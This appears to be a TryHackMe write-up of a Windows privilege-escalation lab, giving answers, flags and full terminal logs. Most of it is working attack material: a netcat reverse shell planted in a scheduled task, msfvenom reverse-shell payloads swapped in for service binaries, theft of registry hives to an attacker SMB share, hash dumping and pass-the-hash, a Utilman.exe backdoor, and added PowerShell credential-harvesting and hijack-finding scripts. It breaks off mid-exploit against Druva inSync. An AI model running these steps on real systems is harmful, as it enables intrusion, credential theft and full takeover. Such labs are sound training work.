Post Compromise - 03 Windows Privilege Escalation | TryHackMe
Task 2 Windows Privilege Escalation
Weaknesses that can be abused for privilege escalation:
- Misconfigurations on Windows services or scheduled tasks
- Excessive privileges assigned to our account
- Vulnerable software
- Missing Windows security patches
Question: Users that can change system configurations are part of which group?
Answer: Administrators
Question: The SYSTEM account has more privileges than the Administrator user (aye/nay)
Answer: aye
Task 3 Harvesting Passwords from Usual Spots
Question: A password for the julia.jones user has been left on the PowerShell history. What is the password?
Answer: ZuperCkretPa5z
C:\Users\thm-unpriv>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
ls
whoami
whoami /priv
whoami /group
whoami /groups
cmdkey /?
cmdkey /add:thmdc.local /user:julia.jones /pass:ZuperCkretPa5z
cmdkey /list
cmdkey /delete:thmdc.local
cmdkey /list
runas /?
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cd c:\
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Question: A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
Answer: 098n0x35skjD3
C:\Users\thm-unpriv>type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
<add connectionStringName="LocalSqlServer" maxEventDetailsLength="1073741823" buffer="false" bufferMode="Notification" name="SqlWebEventProvider" type="System.Web.Management.SqlWebEventProvider,System.Web,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a" />
<add connectionStringName="LocalSqlServer" name="AspNetSqlPersonalizationProvider" type="System.Web.UI.WebControls.WebParts.SqlPersonalizationProvider, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<connectionStrings>
<add connectionString="Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3" name="THM-DB" />
</connectionStrings>
Question: There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Answer: THM{WHAT_IS_MY_PASSWORD}
C:\Users\thm-unpriv>whoami
wprivesc1\thm-unpriv
C:\Users\thm-unpriv>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WPRIVESC1\mike.katz
Type: Domain Password
User: WPRIVESC1\mike.katz
C:\Users\thm-unpriv>runas /savecred /user:mike.katz cmd.exe
Attempting to start cmd.exe as user "WPRIVESC1\mike.katz" ...
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
wprivesc1\mike.katz
C:\Windows\system32>dir C:\Users\mike.katz\Desktop
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\mike.katz\Desktop
05/04/2022 05:17 AM <DIR> .
05/04/2022 05:17 AM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
05/04/2022 05:17 AM 24 flag.txt
3 File(s) 1,105 bytes
2 Dir(s) 14,820,655,104 bytes free
C:\Windows\system32>type C:\Users\mike.katz\Desktop\flag.txt
THM{WHAT_IS_MY_PASSWORD}
Question: Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
Answer: CoolPass2021
C:\Users\thm-unpriv>reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\My%20ssh%20server
ProxyExcludeList REG_SZ
ProxyDNS REG_DWORD 0x1
ProxyLocalhost REG_DWORD 0x0
ProxyMethod REG_DWORD 0x0
ProxyHost REG_SZ proxy
ProxyPort REG_DWORD 0x50
ProxyUsername REG_SZ thom.smith
ProxyPassword REG_SZ CoolPass2021
ProxyTelnetCommand REG_SZ connect %host %port\n
ProxyLogToTerm REG_DWORD 0x1
End of search: 10 match(es) found.
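The four spots above (PSReadline history, web.config connection strings, saved Windows credentials, PuTTY sessions) can be swept in one run. The script below is an added example written for this write-up, not part of the room; the function names are mine, and it assumes the default PSReadline history location plus C:\inetpub and the machine-wide .NET config directories as web.config roots.

```powershell
# Added example (not part of the room): sweep the "usual spots" from Task 3 for
# leftover credentials in one go. Run as the unprivileged user on the target.
# Assumptions: default PSReadline history path; IIS/.NET config roots listed below.

function Get-PSReadlineSecrets {
    # ConsoleHost_history.txt is per user and records every interactive PowerShell
    # command, including cmdkey /add and runas lines with passwords typed inline.
    $hist = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
    if (-not (Test-Path $hist)) { return }
    Select-String -Path $hist -Pattern '/pass:|password|pwd=|secret' |
        ForEach-Object { [pscustomobject]@{ Source = 'PSReadline'; Hit = $_.Line.Trim() } }
}

function Get-WebConfigSecrets {
    # Parse each web.config as XML and read connectionString attributes directly,
    # which is more reliable than grepping for the word "connectionString".
    param([string[]]$Roots = @('C:\inetpub',
                               "$env:windir\Microsoft.NET\Framework64",
                               "$env:windir\Microsoft.NET\Framework"))
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($f in Get-ChildItem -Path $root -Filter web.config -Recurse -File -ErrorAction SilentlyContinue) {
            try { [xml]$cfg = Get-Content -Raw -LiteralPath $f.FullName } catch { continue }
            foreach ($add in $cfg.SelectNodes('//connectionStrings/add[@connectionString]')) {
                [pscustomobject]@{ Source = $f.FullName
                                   Hit    = '{0}: {1}' -f $add.GetAttribute('name'), $add.GetAttribute('connectionString') }
            }
        }
    }
}

function Get-SavedCredentialTargets {
    # cmdkey /list never shows the secret, but every stored entry can be replayed
    # with: runas /savecred /user:<User> cmd.exe
    $current = $null
    foreach ($line in (cmdkey /list)) {
        if ($line -match '^\s*Target:\s*(.+)$') { $current = $Matches[1] }
        elseif ($line -match '^\s*User:\s*(.+)$' -and $current) {
            [pscustomobject]@{ Source = 'cmdkey'; Hit = "$current -> $($Matches[1]) (runas /savecred /user:$($Matches[1]) cmd.exe)" }
            $current = $null
        }
    }
}

function Get-PuttySecrets {
    # PuTTY keeps sessions under HKCU; proxy credentials are stored in clear text.
    $base = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (-not (Test-Path $base)) { return }
    foreach ($key in Get-ChildItem $base) {
        $p = Get-ItemProperty $key.PSPath
        $session = [uri]::UnescapeDataString($key.PSChildName)   # "My%20ssh%20server" -> "My ssh server"
        foreach ($n in 'HostName', 'UserName', 'ProxyHost', 'ProxyUsername', 'ProxyPassword') {
            if ($p.$n) { [pscustomobject]@{ Source = "PuTTY:$session"; Hit = "$n=$($p.$n)" } }
        }
    }
}

@(Get-PSReadlineSecrets; Get-WebConfigSecrets; Get-SavedCredentialTargets; Get-PuttySecrets) |
    Format-Table -AutoSize -Wrap
```

On the room's machine the output would contain the cmdkey /add line from the history, the THM-DB connection string, the mike.katz credential target and the thom.smith proxy password shown above. Every hit is a lead to verify, not a confirmed credential; the cmdkey entries in particular only tell you a runas /savecred attempt is worth making.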
Task 4 Other Quick Wins
Question: What is the taskusr1 flag?
Answer: THM{TASK_COMPLETED}
First of all, check scheduled tasks with the schtasks command:
C:\Users\thm-unpriv>whoami
wprivesc1\thm-unpriv
C:\Users\thm-unpriv>schtasks | findstr "vuln"
vulntask N/A Ready
C:\Users\thm-unpriv> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName: WPRIVESC1
TaskName: \vulntask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 9/20/2023 4:50:15 PM
Last Result: 0
Author: WPRIVESC1\Administrator
Task To Run: C:\tasks\schtask.bat
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: taskusr1
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
The "Task To Run" parameter is C:\tasks\schtask.bat. If our user can write to that file (check its ACL with icacls first), we can replace its contents with any payload; here I've used C:\tools\nc64.exe to spawn a reverse shell:
C:\Users\thm-unpriv>echo c:\tools\nc64.exe -e cmd.exe 10.11.52.229 4444 > C:\tasks\schtask.bat
Then start a listener on the attacker machine:
nc -lvnp 4444
Start the task manually:
C:\Users\thm-unpriv>schtasks /run /tn vulntask
SUCCESS: Attempted to run the scheduled task "vulntask".
Receive the reverse shell with taskusr1 privileges as expected:
❯ ncat -lvnp 4444
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.201.216:49789.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
wprivesc1\taskusr1
C:\Windows\system32>dir C:\Users\taskusr1\Desktop\
dir C:\Users\taskusr1\Desktop\
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\taskusr1\Desktop
05/03/2022 01:00 PM <DIR> .
05/03/2022 01:00 PM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
05/03/2022 01:00 PM 19 flag.txt
3 File(s) 1,100 bytes
2 Dir(s) 15,015,317,504 bytes free
C:\Windows\system32>type C:\Users\taskusr1\Desktop\flag.txt
type C:\Users\taskusr1\Desktop\flag.txt
THM{TASK_COMPLETED}
Task 5 Abusing Service Misconfigurations
Insecure Permissions on Service Executable
Question: Get the flag on svcusr1's desktop.
Check the service properties and permissions:
C:\Users\thm-unpriv>sc qc windowsscheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: windowsscheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler Service
DEPENDENCIES :
SERVICE_START_NAME : .\svcusr1
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
The service installed by the vulnerable software runs as svcusr1, and its executable is C:\Progra~2\System~1\WService.exe. The Everyone group has Modify (M) permission on that executable, so we can simply overwrite it with any payload, and the service will execute it with the privileges of the configured account (svcusr1).
Generate an exe-service payload using msfvenom and serve it through a python webserver:
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.52.229 LPORT=22002 -f exe-service -o rev-svc.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe-service file: 48640 bytes
Saved as: rev-svc.exe
❯ python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
Then just pull the payload through PowerShell, and replace the service executable with it:
PS C:\Users\thm-unpriv> wget http://10.11.52.229/rev-svc.exe -O rev-svc.exe
PS C:\Users\thm-unpriv> move C:\PROGRA~2\SYSTEM~1\WService.exe C:\PROGRA~2\SYSTEM~1\WService.exe.bak
1 file(s) moved.
PS C:\Users\thm-unpriv> move rev-svc.exe C:\PROGRA~2\SYSTEM~1\WService.exe
1 file(s) moved.
The moved payload keeps the ACL it had under our profile (only SYSTEM, Administrators and thm-unpriv), so svcusr1 could not execute it. Grant the Everyone group full permissions:
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WPRIVESC1\thm-unpriv:(F)
Successfully processed 1 files; Failed processing 0 files
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe /grant Everyone:F
processed file: C:\PROGRA~2\SYSTEM~1\WService.exe
Successfully processed 1 files; Failed processing 0 files
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WPRIVESC1\thm-unpriv:(F)
Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
WPRIVESC1\thm-unpriv:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
Start a listener on the attack machine and restart the service on the target:
C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler
❯ ncat -lvnp 22002
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22002
Ncat: Listening on 0.0.0.0:22002
Ncat: Connection from 10.10.2.92:49853.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
wprivesc1\svcusr1
C:\Windows\system32>type C:\Users\svcusr1\Desktop\flag.txt
type C:\Users\svcusr1\Desktop\flag.txt
THM{AT_YOUR_SERVICE}
Answer: THM{AT_YOUR_SERVICE}
Unquoted Service Paths
Question: Get the flag on svcusr2's desktop.
Regenerate an exe-service payload, upload it again and start a listener on attack machine.
Find a service without proper quotation:
PS C:\Users\thm-unpriv\Desktop> sc.exe qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: disk sorter enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Disk Sorter Enterprise
DEPENDENCIES :
SERVICE_START_NAME : .\svcusr2
Because the path C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe is unquoted, the service control manager tries C:\MyPrograms\Disk.exe before the real binary, so this only works if we can write to C:\MyPrograms. Move the payload there, grant Everyone full permissions so svcusr2 can execute it, then restart the service to receive the reverse shell.
PS C:\Users\thm-unpriv\Desktop> move .\svc2.exe C:\MyPrograms\Disk.exe
PS C:\Users\thm-unpriv\Desktop> icacls C:\MyPrograms\Disk.exe /grant Everyone:F
processed file: C:\MyPrograms\Disk.exe
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\thm-unpriv\Desktop> sc.exe stop "disk sorter enterprise"
[SC] ControlService FAILED 1062:
The service has not been started.
PS C:\Users\thm-unpriv\Desktop> sc.exe start "disk sorter enterprise"
SERVICE_NAME: disk sorter enterprise
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 4932
FLAGS :
❯ ncat -lvnp 22003
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22003
Ncat: Listening on 0.0.0.0:22003
Ncat: Connection from 10.10.2.92:49900.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
wprivesc1\svcusr2
C:\Windows\system32>type C:\Users\svcusr2\Desktop\flag.txt
type C:\Users\svcusr2\Desktop\flag.txt
THM{QUOTES_EVERYWHERE}
C:\Windows\system32>
Answer: THM{QUOTES_EVERYWHERE}
Insecure Service Permissions
Question: Get the flag on the Administrator's desktop.
Use Accesschk64.exe
from the sysinternals suite to view the DACL (Discretionary Access Control Lists) on the thmservice:
PS C:\Users\thm-unpriv\Desktop> cd C:\tools\AccessChk\
PS C:\tools\AccessChk> .\accesschk64.exe -qlc thmservice
Accesschk v6.14 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
thmservice
DESCRIPTOR FLAGS:
[SE_DACL_PRESENT]
[SE_SACL_PRESENT]
[SE_SELF_RELATIVE]
OWNER: NT AUTHORITY\SYSTEM
[0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_PAUSE_CONTINUE
SERVICE_START
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[1] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Administrators
SERVICE_ALL_ACCESS
[2] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\INTERACTIVE
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[3] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SERVICE
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
SERVICE_ALL_ACCESS
Here we can see that the BUILTIN\Users group has SERVICE_ALL_ACCESS, which includes SERVICE_CHANGE_CONFIG, so any user can reconfigure the service (its binary path and the account it runs as).
Regenerate an exe-service payload, upload it again and start a listener on attack machine. Also, grant the payload with Everyone full permissions.
PS C:\tools\AccessChk> cd C:\Users\thm-unpriv\Desktop
PS C:\Users\thm-unpriv\Desktop> wget http://10.11.52.229/svc3.exe -O svc3.exe
PS C:\Users\thm-unpriv\Desktop> ls
Directory: C:\Users\thm-unpriv\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2022 8:15 AM 1387 ProcessHacker.lnk
-a---- 9/23/2023 7:19 AM 48640 svc3.exe
PS C:\Users\thm-unpriv\Desktop> icacls .\svc3.exe /grant Everyone:F
processed file: .\svc3.exe
Successfully processed 1 files; Failed processing 0 files
Reconfigure the vulnerable "thmservice" and restart it:
PS C:\Users\thm-unpriv\Desktop> sc.exe config THMService binPath= "C:\Users\thm-unpriv\Desktop\svc3.exe" obj= LocalSystem
[SC] ChangeServiceConfig SUCCESS
PS C:\Users\thm-unpriv\Desktop> sc.exe start THMService
SERVICE_NAME: THMService
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 756
FLAGS :
❯ ncat -lvnp 22004
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22004
Ncat: Listening on 0.0.0.0:22004
Ncat: Connection from 10.10.2.92:49908.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\flag.txt
type C:\Users\Administrator\Desktop\flag.txt
THM{INSECURE_SVC_CONFIG}
C:\Windows\system32>
Answer: THM{INSECURE_SVC_CONFIG}
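The manual checks in Task 4 (writable scheduled task action) and the three sections of Task 5 (writable service binary, unquoted path, weak service DACL) can be run as one sweep. The script below is an added example for this write-up, not part of the room or its tooling; Test-WritableByMe, Find-HijackableTasks, Get-ServiceExePath and Find-WeakServices are my own names, and it assumes Windows PowerShell 5.1 with sc.exe available on the target.

```powershell
# Added example (not part of the room): one sweep for the misconfigurations abused in
# Task 4 and Task 5: a scheduled task or service binary we can overwrite, an unquoted
# service path whose directory we can write to, and a service DACL that lets us change
# its configuration. Assumes Windows PowerShell 5.1 on the target and sc.exe in PATH.

$ErrorActionPreference = 'SilentlyContinue'
$Me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @($Me.User.Value) + @($Me.Groups | ForEach-Object { $_.Value })   # our SID plus every group SID

function Test-WritableByMe {
    # True when an Allow ACE for us (or one of our groups) carries WriteData/CreateFiles
    # (0x2), GENERIC_WRITE (0x40000000) or GENERIC_ALL (0x10000000). Deny ACEs are not
    # evaluated, so confirm a hit by actually writing before building on it.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($MySids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights) -band 0x50000002) { return $true }
    }
    return $false
}

function Find-HijackableTasks {
    # Scheduled tasks that run as someone else and whose action file we can overwrite
    # (the vulntask / C:\tasks\schtask.bat case from Task 4).
    $myName = $Me.Name.Split('\')[-1]
    foreach ($t in Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' -and $_.Principal.UserId }) {
        if ($t.Principal.UserId.Split('\')[-1] -ieq $myName) { continue }
        foreach ($a in $t.Actions) {
            if (-not $a.Execute) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($a.Execute).Trim('"')
            if ((Test-Path -LiteralPath $exe) -and (Test-WritableByMe $exe)) {
                [pscustomobject]@{ Kind = 'Task'; Name = $t.TaskPath + $t.TaskName; RunAs = $t.Principal.UserId
                                   Path = $exe; Why = 'writable action file' }
            }
        }
    }
}

function Get-ServiceExePath {
    # Extract the executable from a service command line, honouring quotes when present.
    param([string]$CommandLine)
    if ($CommandLine -match '^"([^"]+)"')    { return $Matches[1] }
    if ($CommandLine -match '^(.+?\.exe)\b') { return $Matches[1] }
    return ($CommandLine -split '\s+')[0]
}

function Find-WeakServices {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe  = Get-ServiceExePath $svc.PathName
        $base = [pscustomobject]@{ Kind = 'Service'; Name = $svc.Name; RunAs = $svc.StartName; Path = $exe; Why = '' }

        # 1. Insecure permissions on the service executable (the WService.exe case).
        if ((Test-Path -LiteralPath $exe) -and (Test-WritableByMe $exe)) {
            $o = $base.PSObject.Copy(); $o.Why = 'writable service binary'; $o
        }

        # 2. Unquoted path with spaces: the SCM tries C:\Dir\First.exe, C:\Dir\First Second.exe, ...
        #    before the real binary, so a writable parent directory is enough (the disksrs.exe case).
        if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
            $parts = $exe -split ' '
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                $dir = Split-Path -Parent $candidate
                if ($dir -and (Test-Path -LiteralPath $dir) -and (Test-WritableByMe $dir)) {
                    $o = $base.PSObject.Copy(); $o.Path = $candidate; $o.Why = 'unquoted path, writable directory'; $o
                }
            }
        }

        # 3. Service DACL (the THMService case): sc sdshow prints it as SDDL; flag any Allow ACE for us
        #    with SERVICE_CHANGE_CONFIG (0x2), WRITE_DAC (0x40000), WRITE_OWNER (0x80000) or GENERIC_ALL.
        $sddl = (sc.exe sdshow $svc.Name | Where-Object { $_ -match '^\s*D:' }) -replace '\s', ''
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne 'AccessAllowed' -or $MySids -notcontains $ace.SecurityIdentifier.Value) { continue }
            if ($ace.AccessMask -band 0x100C0002) {
                $o = $base.PSObject.Copy(); $o.Why = 'reconfigurable (access mask 0x{0:X} for {1})' -f $ace.AccessMask, $ace.SecurityIdentifier; $o
            }
        }
    }
}

@(Find-HijackableTasks) + @(Find-WeakServices) | Format-Table -AutoSize -Wrap
```

A task hit is exploited as in Task 4 (overwrite the action file, then schtasks /run /tn if our user may start it, otherwise wait for its trigger); a service hit as in Task 5. The ACL test deliberately ignores Deny ACEs and inheritance subtleties, so treat a hit as a candidate and confirm it by writing to the file or directory before staging a payload.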
Task 6 Abusing dangerous privileges
Question: Get the flag on the Administrator's desktop.
SeBackup / SeRestore
Check the privileges on the target (open an elevated command prompt with "Run as administrator"):
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
To copy files from the target to the attack machine, I'd like to use impacket's smbserver.py (installable with pip install impacket) to start a simple SMB server with a share. Giving the share the same username and password as the account we are logged on with lets the copy command authenticate to it without a separate net use:
❯ mkdir share
❯ smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B32****EE188 V:3.0
[*] Callback added for UUID 6BFF****E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Then back up the SAM and SYSTEM registry hives on the target and copy the files to the share. whoami lists SeBackupPrivilege as Disabled, but it only needs to be present in the token: reg save enables it when it needs it.
PS C:\Windows\system32> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.
PS C:\Windows\system32> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.
PS C:\Windows\system32> copy C:\Users\THMBackup\sam.hive \\10.11.52.229\public\
PS C:\Windows\system32> copy C:\Users\THMBackup\system.hive \\10.11.52.229\public\
We can now run impacket's secretsdump.py offline against the two hives to get the Administrator's NTLM hash:
❯ secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
THMBackup:1008:aad3b435b51404eeaad3b435b51404ee:6c252027fb2022f5051e854e08023537:::
THMTakeOwnership:1009:aad3b435b51404eeaad3b435b51404ee:0af9b65477395b680b822e0b2c45b93b:::
[*] Cleaning up...
Finally, we can use impacket's psexec.py with the Administrator's hash to perform a Pass-the-Hash attack and get a SYSTEM shell on the target:
❯ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 Administrator@10.10.47.4
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.47.4.....
[*] Found writable share ADMIN$
[*] Uploading file NvvXZONf.exe
[*] Opening SVCManager on 10.10.47.4.....
[*] Creating service uteZ on 10.10.47.4.....
[*] Starting service uteZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\flag.txt
THM{SEFLAGPRIVILEGE}
C:\Windows\system32>
Answer: THM{SEFLAGPRIVILEGE}
SeTakeOwnership
Check the privileges on the target (open an elevated command prompt with "Run as administrator"):
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ======================================== ========
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We can also abuse utilman.exe to escalate privileges in this case: it is started by the logon screen as SYSTEM, so with SeTakeOwnershipPrivilege we can take ownership of it and grant ourselves full permission:
PS C:\Windows\system32> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WPRIVESC2\THMTakeOwnership".
PS C:\Windows\system32> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: C:\Windows\System32\Utilman.exe
Successfully processed 1 files; Failed processing 0 files
PS C:\Windows\system32>
Then replace utilman.exe with a copy of cmd.exe (keep a copy of the original so it can be restored afterwards):
PS C:\Windows\system32> copy cmd.exe Utilman.exe
We can now trigger utilman.exe by locking the session (Win+L) and clicking the Ease of Access button on the lock screen, which gives us a shell running as SYSTEM:
Task 7 Abusing vulnerable software
Question: Get the flag on the Administrator's desktop.
Druva inSync 6.6.3 exploit code, exp.ps1:
$ErrorActionPreference = "Stop"
# Command the inSync service (running as SYSTEM) will execute for us.
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
